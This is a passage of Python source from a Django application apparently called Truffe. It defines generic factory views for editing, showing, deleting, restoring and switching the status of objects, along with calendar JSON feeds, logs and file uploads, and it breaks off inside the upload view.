lines_objects = filter(lambda lo: not hasattr(obj.MetaEdit, 'only_if') or lo['related_name'] not in obj.MetaEdit.only_if or obj.MetaEdit.only_if[lo['related_name']]((obj, request.user)), copy.deepcopy(obj.MetaLines.lines_objects))
for line_data in lines_objects:
line_data['form'] = getattr(importlib.import_module('.'.join(line_data['form'].split('.')[:-1])), line_data['form'].split('.')[-1])
line_data['class'] = getattr(importlib.import_module('.'.join(line_data['class'].split('.')[:-1])), line_data['class'].split('.')[-1])
line_data['new_form'] = line_data['form'](prefix="_LINES_%s_-ID-" % (line_data['related_name'],))
line_data['forms'] = []
tag_mode = tag_class is not None
tags = []
if tag_mode:
tags_before = ','.join([t.tag for t in obj.tags.order_by('tag')]) if obj.pk else ''
linked_info_mode = hasattr(model_class, 'MetaEdit') and hasattr(model_class.MetaEdit, 'set_linked_info') and model_class.MetaEdit.set_linked_info
if request.method == 'POST': # If the form has been submitted...
form = form_class(request.user, request.POST, request.FILES, instance=obj)
form.truffe_request = request
if file_mode:
file_key = request.POST.get('file_key')
if tag_mode:
tags = filter(lambda t: t, request.POST.get('tags').split(','))
all_forms_valids = True
for line_data in lines_objects:
for submited_id in request.POST.getlist('_LINES_LIST_%s[]' % (line_data['related_name'], )):
if submited_id != '-ID-':
if submited_id.startswith('NEW-'):
line_instance = line_data['class'](**{line_data['field']: obj})
else:
line_instance = get_object_or_404(line_data['class'], pk=submited_id, **{line_data['field']: obj})
line_old_val = line_instance.__unicode__()
line_form = line_data['form'](request.POST, request.FILES, instance=line_instance, prefix="_LINES_%s_%s" % (line_data['related_name'], submited_id))
if not line_form.is_valid():
all_forms_valids = False
line_form_data = {'id': submited_id, 'form': line_form, 'old_val': line_old_val}
line_data['forms'].append(line_form_data)
form._clean_line_data = lines_objects
if form.is_valid() and all_forms_valids: # If the form is valid
right = 'EDIT' if obj.pk else 'CREATE'
obj = form.save(commit=False)
if not obj.rights_can(right, request.user):
messages.error(request, _(u'Tu n\'as pas le droit de créer/modifier cet objet.'))
return redirect('{}.views.{}_edit'.format(module.__name__, base_name), pk='~' if right == 'CREATE' else obj.pk)
obj.save()
if hasattr(form, 'save_m2m'):
form.save_m2m()
lines_adds = {}
lines_updates = {}
lines_deletes = {}
for line_data in lines_objects:
valids_ids = []
line_order = 0
for line_form in line_data['forms']:
line_obj = line_form['form'].save(commit=False)
setattr(line_obj, line_data['field'], obj)
if not line_obj.pk:
lines_adds['%s' % (line_data['related_name'],)] = line_obj.__unicode__()
else:
if line_form['old_val'] != line_obj.__unicode__():
lines_updates['%s #%s' % (line_data['related_name'], line_obj.pk,)] = (line_form['old_val'], line_obj.__unicode__())
if line_data['sortable']:
line_obj.order = line_order
line_order += 1
line_obj.save()
valids_ids.append(line_obj.pk)
for line_deleted in getattr(obj, line_data['related_name']).exclude(pk__in=valids_ids):
lines_deletes['%s #%s' % (line_data['related_name'], line_deleted.pk,)] = line_deleted.__unicode__()
line_deleted.delete()
if file_mode:
files_data = request.session.get('pca_files_%s' % (file_key,))
if files_data is None:
messages.warning(request, _(u'Erreur lors de la récupération de la session pour la gestion des fichiers. Il est possible que le formulaire aie été sauvegardé deux fois. Vérifiez si l\'état actuel des fichiers correspond à ce que vous désirez !'))
else:
for file_pk in files_data:
file_obj = file_class.objects.get(pk=file_pk)
if file_obj.object != obj:
file_obj.object = obj
file_obj.save()
log_class(who=request.user, what='file_added', object=obj, extra_data=file_obj.basename()).save()
for file_obj in obj.files.all():
if file_obj.pk not in files_data:
log_class(who=request.user, what='file_removed', object=obj, extra_data=file_obj.basename()).save()
os.unlink(file_obj.file.path)
file_obj.delete()
# Clean up session
del request.session['pca_files_%s' % (file_key,)]
if tag_mode:
for t in tags:
__, ___ = tag_class.objects.get_or_create(tag=t, object=obj)
tag_class.objects.filter(object=obj).exclude(tag__in=tags).delete()
tags_after = ', '.join([t.tag for t in obj.tags.order_by('tag')])
if linked_info_mode:
object_ct = ContentType.objects.get(app_label=module.__name__, model=base_name)
infos, __ = LinkedInfo.objects.get_or_create(content_type=object_ct, object_id=obj.pk, defaults={'user_pk': obj.user.pk})
for (info_field, user_field) in (('first_name', 'first_name'), ('last_name', 'last_name'), ('address', 'adresse'), ('phone', 'mobile'), ('bank', 'nom_banque'), ('iban_ccp', 'iban_ou_ccp'), ('user_pk', 'pk')):
setattr(infos, info_field, getattr(obj.user, user_field))
infos.save()
if isinstance(obj, BasicRightModel):
obj.rights_expire()
if hasattr(obj, 'save_signal'):
obj.save_signal()
if hasattr(obj, 'MetaEdit') and hasattr(obj.MetaEdit, 'do_extra_post_actions'):
extra_args = obj.MetaEdit.do_extra_post_actions(obj, request, request.POST, True)
for (lines, logs) in [(lines_adds, 'log_add'), (lines_updates, 'log_update'), (lines_deletes, 'log_delete')]:
lines.update(extra_args[logs])
messages.success(request, _(u'Élément sauvegardé !'))
if not before_data:
log_class(who=request.user, what='created', object=obj).save()
if hasattr(obj, 'create_signal'):
obj.create_signal(request)
else:
# Compute diff
after_data = obj.build_state()
for key in list(before_data)[::]: # Be sure we're on a copy
if key in after_data and after_data[key] == before_data[key]:
del after_data[key]
del before_data[key]
added = {}
edited = {}
deleted = {}
for key in before_data:
if key not in after_data:
deleted[key] = before_data[key]
else:
if not after_data[key]:
deleted[key] = before_data[key]
del after_data[key]
elif before_data[key]:
edited[key] = (before_data[key], after_data[key])
del after_data[key]
added = after_data
added.update(lines_adds)
edited.update(lines_updates)
deleted.update(lines_deletes)
if tag_mode and tags_before != tags_after:
edited['tags'] = (tags_before, tags_after)
diff = {'added': added, 'edited': edited, 'deleted': deleted}
log_class(who=request.user, what='edited', object=obj, extra_data=json.dumps(diff)).save()
obj.user_has_seen_object(request.user)
if request.POST.get('post-save-dest'):
if request.POST.get('post-save-dest') == 'new':
return redirect(module.__name__ + '.views.' + base_name + '_edit', pk='~')
else:
return redirect(module.__name__ + '.views.' + base_name + '_edit', pk=obj.pk)
return HttpResponseRedirect('%s%s' % (reverse(module.__name__ + '.views.' + base_name + '_show', args=(obj.pk,)), '?_upkns=_&_fromrelated=_' if related_mode else ''))
else:
if hasattr(obj, 'MetaEdit') and hasattr(obj.MetaEdit, 'do_extra_post_actions'):
extra_args = obj.MetaEdit.do_extra_post_actions(obj, request, request.POST, False)
else:
form = form_class(request.user, instance=obj)
if file_mode:
# Generate a new file session
file_key = <KEY>
request.session['pca_files_%s' % (file_key,)] = [f.pk for f in obj.files.all()] if obj.pk else []
# Init subforms
for line_data in lines_objects:
if obj.pk:
line_objs = getattr(obj, line_data['related_name'])
if line_data['sortable']:
line_objs = line_objs.order_by('order')
else:
line_objs = line_objs.order_by('pk')
for line_obj in line_objs:
line_form = line_data['form'](instance=line_obj, prefix="_LINES_%s_%s" % (line_data['related_name'], line_obj.pk))
line_form_data = {'id': line_obj.pk, 'form': line_form}
line_data['forms'].append(line_form_data)
if tag_mode:
tags = [t.tag for t in obj.tags.all()] if obj.pk else []
if file_mode:
if 'pca_files_%s' % (file_key,) in request.session:
files = [file_class.objects.get(pk=pk_) for pk_ in request.session['pca_files_%s' % (file_key,)]]
else:
files = None
messages.warning(request, _(u'Erreur lors de la récupération de la session pour la gestion des fichiers. Il est possible que le formulaire aie été sauvegardé deux fois. Vérifiez si l\'état actuel des fichiers correspond à ce que vous désirez !'))
else:
files = None
costcenter_mode = isinstance(obj, CostCenterLinked)
data = {'Model': model_class, 'form': form, 'list_view': list_view, 'show_view': show_view, 'unit_mode': unit_mode, 'current_unit': current_unit,
'main_unit': main_unit, 'unit_blank': unit_blank, 'year_mode': year_mode, 'current_year': current_year,
'years_available': AccountingYear.build_year_menu('EDIT' if obj.pk else 'CREATE', request.user), 'related_mode': related_mode, 'list_related_view': list_related_view,
'file_mode': file_mode, 'file_upload_view': file_upload_view, 'file_delete_view': file_delete_view, 'files': files, 'file_key': file_key, 'file_get_view': file_get_view,
'file_get_thumbnail_view': file_get_thumbnail_view, 'lines_objects': lines_objects, 'costcenter_mode': costcenter_mode, 'tag_mode': tag_mode, 'tags': tags,
'tag_search_view': tag_search_view, 'extra_args': extra_args.get('display', '')}
if hasattr(model_class.MetaData, 'extra_args_for_edit'):
data.update(model_class.MetaData.extra_args_for_edit(request, current_unit, current_year))
return render(request, ['%s/%s/edit.html' % (module.__name__, base_name), 'generic/generic/edit.html'], data)
return _generic_edit
def generate_show(module, base_name, model_class, log_class, tag_class):
@login_required
def _generic_show(request, pk):
edit_view = '%s.views.%s_edit' % (module.__name__, base_name)
delete_view = '%s.views.%s_delete' % (module.__name__, base_name)
log_view = '%s.views.%s_log' % (module.__name__, base_name)
list_view = '%s.views.%s_list' % (module.__name__, base_name)
list_related_view = '%s.views.%s_list_related' % (module.__name__, base_name)
status_view = '%s.views.%s_switch_status' % (module.__name__, base_name)
contact_view = '%s.views.%s_contact' % (module.__name__, base_name)
file_get_view = '%s.views.%s_file_get' % (module.__name__, base_name)
file_get_thumbnail_view = '%s.views.%s_file_get_thumbnail' % (module.__name__, base_name)
related_mode = request.GET.get('_fromrelated') == '_'
obj = get_object_or_404(model_class, pk=pk)
year_mode, current_year, AccountingYear = get_year_data(model_class, request)
unit_mode, current_unit, unit_blank = get_unit_data(model_class, request)
if unit_mode:
unit = obj.costcenter.unit if isinstance(obj, CostCenterLinked) else obj.unit
update_current_unit(request, unit.pk if unit else -1)
current_unit = unit
if year_mode:
update_current_year(request, obj.accounting_year.pk)
current_year = obj.accounting_year
if isinstance(obj, BasicRightModel) and not obj.rights_can('SHOW', request.user):
raise Http404
if obj.deleted:
return render(request, ['%s/%s/show_deleted.html' % (module.__name__, base_name), 'generic/generic/show_deleted.html'], {
'Model': model_class, 'delete_view': delete_view, 'edit_view': edit_view, 'log_view': log_view, 'list_view': list_view, 'status_view': status_view, 'contact_view': contact_view, 'list_related_view': list_related_view, 'file_get_view': file_get_view, 'file_get_thumbnail_view': file_get_thumbnail_view,
'obj': obj,
})
rights = []
if hasattr(model_class, 'MetaRights'):
for key, info in obj.MetaRights.rights.iteritems():
rights.append((key, info, obj.rights_can(key, request.user)))
log_entires = log_class.objects.filter(object=obj).order_by('-when').all()
if hasattr(obj, 'contactables_groups'):
contactables_groups = obj.contactables_groups()
else:
contactables_groups = None
lines_objects = []
from generic.models import GenericModelWithLines
if issubclass(model_class, GenericModelWithLines):
lines_objects = copy.deepcopy(obj.MetaLines.lines_objects)
for line_data in lines_objects:
line_objs = getattr(obj, line_data['related_name'])
if line_data['sortable']:
line_objs = line_objs.order_by('order')
else:
line_objs = line_objs.order_by('pk')
line_data['elems'] = line_objs
tags = []
if tag_class:
tags = [t.tag for t in obj.tags.order_by('tag')]
obj.user_has_seen_object(request.user)
return render(request, ['%s/%s/show.html' % (module.__name__, base_name), 'generic/generic/show.html'], {
'Model': model_class, 'delete_view': delete_view, 'edit_view': edit_view, 'log_view': log_view, 'list_view': list_view, 'status_view': status_view, 'contact_view': contact_view, 'list_related_view': list_related_view, 'file_get_view': file_get_view, 'file_get_thumbnail_view': file_get_thumbnail_view,
'obj': obj, 'log_entires': log_entires,
'rights': rights,
'unit_mode': unit_mode, 'current_unit': current_unit,
'year_mode': year_mode, 'current_year': current_year,
'contactables_groups': contactables_groups,
'related_mode': related_mode, 'lines_objects': lines_objects,
'tags': tags,
})
return _generic_show
def generate_delete(module, base_name, model_class, log_class):
@login_required
def _generic_delete(request, pk):
list_view = '%s.views.%s_list' % (module.__name__, base_name)
list_related_view = '%s.views.%s_list_related' % (module.__name__, base_name)
show_view = '%s.views.%s_show' % (module.__name__, base_name)
related_mode = request.GET.get('_fromrelated') == '_'
objs = [get_object_or_404(model_class, pk=pk_, deleted=False) for pk_ in filter(lambda x: x, pk.split(','))]
multi_obj = len(objs) > 1
for obj in objs:
unit_mode, current_unit, unit_blank = get_unit_data(model_class, request)
year_mode, current_year, AccountingYear = get_year_data(model_class, request)
if unit_mode:
if isinstance(obj, CostCenterLinked):
update_current_unit(request, obj.costcenter.unit.pk if obj.costcenter.unit else -1)
else:
update_current_unit(request, obj.unit.pk if obj.unit else -1)
if year_mode:
update_current_year(request, obj.accounting_year.pk)
if isinstance(obj, BasicRightModel) and not obj.rights_can('DELETE', request.user):
raise Http404
can_delete = True
can_delete_message = ''
prob_obj = None
for obj in objs:
if hasattr(obj, 'can_delete'):
(can_delete, can_delete_message) = obj.can_delete()
if not can_delete:
prob_obj = obj
if can_delete and request.method == 'POST' and request.POST.get('do') == 'it':
for obj in objs:
obj.deleted = True
if hasattr(obj, 'delete_signal'):
obj.delete_signal(request)
obj.save()
log_class(who=request.user, what='deleted', object=obj).save()
messages.success(request, _(u'Élément supprimé !'))
if related_mode:
return redirect(list_related_view)
else:
return redirect(list_view)
return render(request, ['%s/%s/delete.html' % (module.__name__, base_name), 'generic/generic/delete.html'], {
'Model': model_class, 'show_view': show_view, 'list_view': list_view, 'list_related_view': list_related_view,
'objs': objs, 'can_delete': can_delete, 'can_delete_message': can_delete_message,
'related_mode': related_mode, 'multi_obj': multi_obj, 'prob_obj': prob_obj
})
return _generic_delete
def generate_deleted(module, base_name, model_class, log_class):
@login_required
def _generic_deleted(request):
list_view = '%s.views.%s_list' % (module.__name__, base_name)
year_mode, current_year, AccountingYear = get_year_data(model_class, request)
unit_mode, current_unit, unit_blank = get_unit_data(model_class, request)
if hasattr(model_class, 'static_rights_can') and not model_class.static_rights_can('RESTORE', request.user, current_unit, current_year):
raise Http404
if unit_mode:
from units.models import Unit
main_unit = Unit.objects.get(pk=settings.ROOT_UNIT_PK)
main_unit.set_rights_can_select(lambda unit: model_class.static_rights_can('RESTORE', request.user, unit, current_year))
main_unit.set_rights_can_edit(lambda unit: model_class.static_rights_can('RESTORE', request.user, unit, current_year))
main_unit.check_if_can_use_hidden(request.user)
else:
main_unit = None
if request.method == 'POST':
obj = get_object_or_404(model_class, pk=request.POST.get('pk'), deleted=True)
if unit_mode:
if isinstance(obj, CostCenterLinked):
update_current_unit(request, obj.costcenter.unit.pk if obj.costcenter.unit else -1)
else:
update_current_unit(request, obj.unit.pk if obj.unit else -1)
if year_mode:
update_current_year(request, obj.accounting_year.pk)
if isinstance(obj, BasicRightModel) and not obj.rights_can('RESTORE', request.user):
raise Http404
obj.deleted = False
if hasattr(obj, 'restore_signal'):
obj.restore_signal()
obj.save()
log_class(who=request.user, what='restored', object=obj).save()
messages.success(request, _(u'Élément restauré !'))
return redirect(list_view)
liste = model_class.objects.filter(deleted=True).annotate(Max('logs__when')).order_by('-logs__when__max')
if unit_mode:
if isinstance(model_class(), CostCenterLinked):
liste = liste.filter(costcenter__unit=current_unit)
else:
liste = liste.filter(unit=current_unit)
if year_mode:
liste = liste.filter(accounting_year=current_year)
else:
liste = liste.all()
return render(request, ['%s/%s/deleted.html' % (module.__name__, base_name), 'generic/generic/deleted.html'], {
'Model': model_class, 'list_view': list_view, 'liste': liste,
'unit_mode': unit_mode, 'current_unit': current_unit, 'main_unit': main_unit, 'unit_blank': unit_blank,
'year_mode': year_mode, 'current_year': current_year, 'years_available': AccountingYear.build_year_menu('RESTORE', request.user),
})
return _generic_deleted
def generate_switch_status(module, base_name, model_class, log_class):
@login_required
def _switch_status(request, pk):
objs = [get_object_or_404(model_class, pk=pk_, deleted=False) for pk_ in filter(lambda x: x, pk.split(','))]
multi_obj = len(objs) > 1
unit_mode, current_unit, unit_blank = get_unit_data(model_class, request)
        # Don't switch the current unit when switching status
# if unit_mode:
# update_current_unit(request, obj.unit.pk if obj.unit else -1)
can_switch = True
can_switch_message = ''
done = False
prob_obj = None
no_more_access = False
list_view = '%s.views.%s_list' % (module.__name__, base_name)
status_view = '%s.views.%s_switch_status' % (module.__name__, base_name)
dest_status = request.GET.get('dest_status')
from_list = request.GET.get('from_list') == 'from_list'
for obj in objs:
if not hasattr(obj, 'MetaState') or dest_status not in obj.MetaState.states:
raise Http404
(can_switch, can_switch_message) = obj.can_switch_to(request.user, dest_status)
if not can_switch:
prob_obj = obj
bonus_form = None
if hasattr(model_class.MetaState, 'states_bonus_form'):
bonus_form = model_class.MetaState.states_bonus_form.get((obj.status, dest_status), model_class.MetaState.states_bonus_form.get(dest_status, None))
if bonus_form and hasattr(bonus_form, '__call__') and not inspect.isclass(bonus_form):
bonus_form = bonus_form(request, obj)
if can_switch and request.method == 'POST' and request.POST.get('do') == 'it':
for obj in objs:
old_status = obj.status
obj.status = dest_status
obj.user_has_seen_object(request.user)
obj.save()
if isinstance(obj, BasicRightModel):
obj.rights_expire()
if hasattr(obj, 'switch_status_signal'):
obj.switch_status_signal(request, old_status, dest_status)
log_class(who=request.user, what='state_changed', object=obj, extra_data=json.dumps({'old': unicode(obj.MetaState.states.get(old_status)), 'new': unicode(obj.MetaState.states.get(dest_status))})).save()
storage = messages.get_messages(request)
if not storage:
messages.success(request, _(u'Statut modifié !'))
storage.used = False
done = True
no_more_access = not obj.rights_can('SHOW', request.user)
if no_more_access:
messages.warning(request, _(u'Vous avez perdu le droit de voir l\'objet !'))
obj.user_has_seen_object(request.user)
return render(request, ['%s/%s/switch_status.html' % (module.__name__, base_name), 'generic/generic/switch_status.html'], {
'Model': model_class, 'objs': objs, 'can_switch': can_switch, 'can_switch_message': can_switch_message, 'done': done, 'no_more_access': no_more_access,
'dest_status': dest_status, 'dest_status_message': objs[0].MetaState.states.get(dest_status),
'status_view': status_view, 'list_view': list_view,
'bonus_form': bonus_form() if bonus_form else None,
'from_list': from_list, 'multi_obj': multi_obj, 'prob_obj': prob_obj, 'pk': pk,
})
return _switch_status
def generate_contact(module, base_name, model_class, log_class):
@login_required
def _contact(request, pk, key):
contact_view = '%s.views.%s_contact' % (module.__name__, base_name)
show_view = '%s.views.%s_show' % (module.__name__, base_name)
obj = get_object_or_404(model_class, pk=pk, deleted=False)
unit_mode, current_unit, unit_blank = get_unit_data(model_class, request)
year_mode, current_year, AccountingYear = get_year_data(model_class, request)
if unit_mode:
if isinstance(obj, CostCenterLinked):
update_current_unit(request, obj.costcenter.unit.pk if obj.costcenter.unit else -1)
else:
update_current_unit(request, obj.unit.pk if obj.unit else -1)
if year_mode:
update_current_year(request, obj.accounting_year.pk)
if isinstance(obj, BasicRightModel) and not obj.rights_can('SHOW', request.user):
raise Http404
if not hasattr(obj, 'contactables_groups'):
raise Http404
contactables_groups = obj.contactables_groups()
done = False
if request.method == 'POST':
form = ContactForm(contactables_groups, request.POST)
if form.is_valid():
dest = [u.email for u in getattr(obj, 'build_group_members_for_%s' % (form.cleaned_data['key'],))()]
context = {
'subject': form.cleaned_data['subject'],
'show_view': show_view,
'message': form.cleaned_data['message'],
'sender': request.user,
'obj': obj
}
send_templated_mail(request, _('Truffe :: Contact :: %s') % (form.cleaned_data['subject'],), request.user.email, dest, 'generic/generic/mail/contact', context)
if form.cleaned_data['receive_copy']:
send_templated_mail(request, _('Truffe :: Contact :: %s') % (form.cleaned_data['subject'],), request.user.email, [request.user.email], 'generic/generic/mail/contact', context)
done = True
messages.success(request, _(u'Message envoyé !'))
else:
form = ContactForm(contactables_groups, initial={'key': key})
return render(request, ['%s/%s/contact.html' % (module.__name__, base_name), 'generic/generic/contact.html'], {
'Model': model_class, 'obj': obj, 'contact_view': contact_view, 'form': form, 'done': done
})
return _contact
def check_unit_name(request):
from units.models import Unit
return HttpResponse(json.dumps({'result': 'ok' if Unit.objects.filter(name__icontains=request.GET.get('name')).count() == 0 else 'err'}))
def generate_calendar(module, base_name, model_class):
return generate_generic_list(module, base_name, model_class, '_calendar_json', 'LIST', 'CREATE', 'calendar', True)
def generate_calendar_json(module, base_name, model_class):
@login_required
@csrf_exempt
def _generic_calendar_json(request):
unit_mode, current_unit, unit_blank = get_unit_data(model_class, request)
year_mode, current_year, AccountingYear = get_year_data(model_class, request)
if unit_mode:
if not current_unit:
if request.user.is_superuser: # Never filter
filter_ = lambda x: x.filter(unit=None)
else:
filter_ = lambda x: x.filter(unit=None, unit_blank_user=request.user)
else:
filter_ = lambda x: x.filter(unit=current_unit)
else:
filter_ = lambda x: x
if year_mode:
filter__ = lambda x: filter_(x).filter(accounting_year=current_year)
else:
filter__ = filter_
if hasattr(model_class, 'static_rights_can') and not model_class.static_rights_can('LIST', request.user, current_unit, current_year):
raise Http404
start = request.GET.get('start')
end = request.GET.get('end')
start = pytz.timezone(settings.TIME_ZONE).localize(datetime.datetime.fromtimestamp(float(start)))
end = pytz.timezone(settings.TIME_ZONE).localize(datetime.datetime.fromtimestamp(float(end)))
liste = filter__(model_class.objects.exclude((Q(start_date__lt=start) & Q(end_date__lt=start)) | (Q(start_date__gt=end) & Q(end_date__gt=end))).filter(Q(status='1_asking') | Q(status='2_online')))
retour = []
for l in liste:
if l.status == '1_asking':
icon = 'fa-question'
className = ["event", "bg-color-redLight"]
else:
icon = 'fa-check'
className = ["event", "bg-color-greenLight"]
if l.rights_can('SHOW', request.user):
url = l.display_url()
else:
url = ''
if hasattr(l, 'get_linked_object'):
linked_object = l.get_linked_object()
if isinstance(linked_object, list):
titre = u'{} (Géré par {})'.format(u', '.join([o.__unicode__() for o in linked_object]), linked_object[0].unit)
else:
titre = u'{} (Géré par {})'.format(l.get_linked_object(), l.get_linked_object().unit)
else:
titre = u'{}'.format(l)
retour.append({'title': titre, 'start': str(l.start_date), 'end': str(l.end_date), 'className': className, 'icon': icon, 'url': url, 'allDay': False, 'description': str(l)})
return HttpResponse(json.dumps(retour))
return _generic_calendar_json
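# Each calendar entry serialized by _generic_calendar_json has the shape built in
# the loop above; the values below are illustrative only:
#
#   {"title": "Beamer (Géré par CLIC)", "start": "2015-05-01 10:00:00+02:00",
#    "end": "2015-05-01 18:00:00+02:00", "className": ["event", "bg-color-greenLight"],
#    "icon": "fa-check", "url": "/logistics/supplyreservation/42/", "allDay": False,
#    "description": "Beamer"}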
def generate_calendar_related(module, base_name, model_class):
return generate_generic_list(module, base_name, model_class, '_calendar_related_json', 'VALIDATE', 'VALIDATE', 'calendar_related', False, True)
def generate_calendar_related_json(module, base_name, model_class):
@login_required
@csrf_exempt
def _generic_calendar_related_json(request):
unit_mode, current_unit, unit_blank = get_unit_data(model_class, request, allow_blank=False)
year_mode, current_year, AccountingYear = get_year_data(model_class, request)
if unit_mode and model_class.MetaState.unit_field != '!root':
if hasattr(model_class.MetaState, 'filter_unit_field'):
filter_ = lambda x: x.filter(**{model_class.MetaState.filter_unit_field.replace('.', '__'): current_unit})
else:
filter_ = lambda x: x.filter(**{model_class.MetaState.unit_field.replace('.', '__'): current_unit})
else:
filter_ = lambda x: x
if year_mode:
filter__ = lambda x: filter_(x).filter(accounting_year=current_year)
else:
filter__ = filter_
if request.GET.get('filter_object'):
if hasattr(model_class.MetaState, 'filter_unit_field'):
filter___ = lambda x: x.filter(**{'__'.join(model_class.MetaState.filter_unit_field.split('.')[:-1] + ['pk']): request.GET.get('filter_object'), model_class.MetaState.filter_unit_field.replace('.', '__'): current_unit})
else:
filter___ = lambda x: x.filter(**{'__'.join(model_class.MetaState.unit_field.split('.')[:-1] + ['pk']): request.GET.get('filter_object'), model_class.MetaState.unit_field.replace('.', '__'): current_unit})
else:
filter___ = lambda x: x
if hasattr(model_class, 'static_rights_can') and not model_class.static_rights_can('VALIDATE', request.user, current_unit, current_year):
raise Http404
start = request.GET.get('start')
end = request.GET.get('end')
start = pytz.timezone(settings.TIME_ZONE).localize(datetime.datetime.fromtimestamp(float(start)))
end = pytz.timezone(settings.TIME_ZONE).localize(datetime.datetime.fromtimestamp(float(end)))
liste = filter___(filter__(model_class.objects.exclude((Q(start_date__lt=start) & Q(end_date__lt=start)) | (Q(start_date__gt=end) & Q(end_date__gt=end))).filter(Q(status='1_asking') | Q(status='2_online')))).exclude(deleted=True).distinct()
retour = []
colors = ['default', 'danger', 'success', 'warning', 'info', 'primary']
for l in liste:
if l.unit:
par = l.unit.name
else:
par = u'%s (%s)' % (l.unit_blank_name, l.unit_blank_user)
if l.status == '1_asking':
icon = 'fa-question'
className = ["event", "bg-color-redLight"]
else:
icon = 'fa-check'
className = ["event", "bg-color-greenLight"]
if l.rights_can('SHOW', request.user):
url = l.display_url()
else:
url = ''
if hasattr(l, 'get_linked_object'):
lobj = l.get_linked_object()
if isinstance(lobj, list):
titre = u'{} (Réservé par {})'.format(u', '.join([o.__unicode__() for o in lobj]), par)
colored = colors[lobj[0].pk % len(colors)]
else:
titre = u'{} (Réservé par {})'.format(lobj, par)
colored = colors[lobj.pk % len(colors)]
else:
titre = u'{} (Réservé par {})'.format(l, par)
colored = ""
retour.append({'title': titre, 'start': str(l.start_date), 'end': str(l.end_date), 'className': className, 'icon': icon, 'url': url, 'allDay': False, 'description': str(l), 'colored': colored})
return HttpResponse(json.dumps(retour))
return _generic_calendar_related_json
def generate_calendar_specific(module, base_name, model_class):
def _check_and_add_context(request, pk):
base_model = model_class.get_linked_object_class()
cobject = get_object_or_404(base_model, pk=pk, deleted=False, allow_calendar=True)
if not cobject.allow_externals and request.user.is_external():
raise Http404()
if not cobject.allow_external_calendar and request.user.is_external():
raise Http404()
return {'cobject': cobject}
return generate_generic_list(module, base_name, model_class, '_calendar_specific_json', 'SHOW', 'SHOW', 'calendar_specific', False, bonus_args_transformator=_check_and_add_context)
def generate_calendar_specific_json(module, base_name, model_class):
@login_required
@csrf_exempt
def _generic_calendar_specific_json(request, pk):
unit_mode, current_unit, unit_blank = get_unit_data(model_class, request, allow_blank=False)
base_model = model_class.get_linked_object_class()
cobject = get_object_or_404(base_model, pk=pk, deleted=False, allow_calendar=True)
if not cobject.allow_externals and request.user.is_external():
raise Http404()
if not cobject.allow_external_calendar and request.user.is_external():
raise Http404()
filter_ = lambda x: x.filter(**{'__'.join(model_class.MetaState.unit_field.split('.')[:-1] + ['pk']): cobject.pk})
start = request.GET.get('start')
end = request.GET.get('end')
start = pytz.timezone(settings.TIME_ZONE).localize(datetime.datetime.fromtimestamp(float(start)))
end = pytz.timezone(settings.TIME_ZONE).localize(datetime.datetime.fromtimestamp(float(end)))
liste = filter_(model_class.objects.exclude((Q(start_date__lt=start) & Q(end_date__lt=start)) | (Q(start_date__gt=end) & Q(end_date__gt=end))).filter(Q(status='1_asking') | Q(status='2_online'))).exclude(deleted=True)
retour = []
for l in liste:
if l.unit:
par = l.unit.name
else:
par = u'%s (%s)' % (l.unit_blank_name, l.unit_blank_user)
if l.status == '1_asking':
icon = 'fa-question'
className = ["event", "bg-color-redLight"]
else:
icon = 'fa-check'
className = ["event", "bg-color-greenLight"]
if l.rights_can('SHOW', request.user):
url = l.display_url()
else:
url = ''
titre = par
retour.append({'title': titre, 'start': str(l.start_date), 'end': str(l.end_date), 'className': className, 'icon': icon, 'url': url, 'allDay': False, 'description': str(l)})
return HttpResponse(json.dumps(retour))
return _generic_calendar_specific_json
def generate_directory(module, base_name, model_class):
@login_required
def _generic_directory(request):
if not model_class.static_rights_can('CREATE', request.user):
raise Http404
from units.models import Unit
edit_view = '%s.views.%s_edit' % (module.__name__, base_name)
calendar_specific_view = '%s.views.%s_calendar_specific' % (module.__name__, base_name)
units = model_class.get_linked_object_class().objects.order_by('unit__name').filter(deleted=False)
if request.user.is_external():
units = units.filter(allow_externals=True)
units = [Unit.objects.get(pk=u['unit']) for u in units.values('unit').distinct()]
for unit in units:
unit.directory_objects = model_class.get_linked_object_class().objects.filter(unit=unit, deleted=False).order_by('title')
if request.user.is_external():
unit.directory_objects = unit.directory_objects.filter(allow_externals=True)
return render(request, ['%s/%s/directory.html' % (module.__name__, base_name), 'generic/generic/directory.html'], {
'Model': model_class, 'edit_view': edit_view, 'calendar_specific_view': calendar_specific_view,
'units': units,
})
return _generic_directory
def generate_logs(module, base_name, model_class):
@login_required
def _generic_logs(request):
        # Checking rights here would be extremely complex: we would have to show
        # only the logs of objects on which the user has the 'DISPLAY_LOG' right,
        # but that cannot be checked at the database level and the results must
        # be paginated. Doing it manually would be horrible performance-wise (for
        # example by first listing every allowed object and then filtering the
        # logs against that list).
if not request.user.is_superuser:
raise Http404
logs_json_view = '%s.views.%s_logs_json' % (module.__name__, base_name)
list_view = '%s.views.%s_list' % (module.__name__, base_name)
data = {
'Model': model_class, 'logs_json_view': logs_json_view, 'list_view': list_view,
}
return render(request, ['%s/%s/logs.html' % (module.__name__, base_name), 'generic/generic/logs.html'], data)
return _generic_logs
def generate_logs_json(module, base_name, model_class, logging_class):
@login_required
@csrf_exempt
def _generic_logs_json(request):
if not request.user.is_superuser:
raise Http404
show_view = '%s.views.%s_show' % (module.__name__, base_name)
list_view = '%s.views.%s_list' % (module.__name__, base_name)
bonus_filter = []
for potential_str in ['title', 'name']:
if hasattr(model_class, potential_str):
bonus_filter += [potential_str]
return generic_list_json(request, logging_class, ['object', 'unit', 'when', 'who', 'what', 'pk'], [module.__name__ + '/' + base_name + '/logs_json.html', 'generic/generic/logs_json.html'],
{'Model': model_class,
'list_view': list_view,
'show_view': show_view,
},
not_sortable_columns=['unit',],
filter_fields=['when', 'who__first_name', 'what'] + bonus_filter,
)
return _generic_logs_json
def generate_file_upload(module, base_name, model_class, log_class, file_class):
@login_required
def _generic_file_upload(request):
file_delete_view = '%s.views.%s_file_delete' % (module.__name__, base_name)
file_get_view = '%s.views.%s_file_get' % (module.__name__, base_name)
file_get_thumbnail_view = '%s.views.%s_file_get_thumbnail' % (module.__name__, base_name)
key = request.GET.get('key')
file = upload_receive(request)
instance = file_class(file=file, uploader=request.user)
instance.save()
basename = os.path.basename(instance.file.path)
file_dict = {
'name': basename,
'size': file.size,
'url': reverse(file_get_view, kwargs={'pk': instance.pk}),
'thumbnailUrl': reverse(file_get_thumbnail_view, kwargs={'pk': instance.pk}),
'deleteUrl': '%s?key=%s' % (reverse(file_delete_view, kwargs={'pk': instance.pk}), key),
'deleteType': 'POST',
}
# Can't do it in one line !
try:
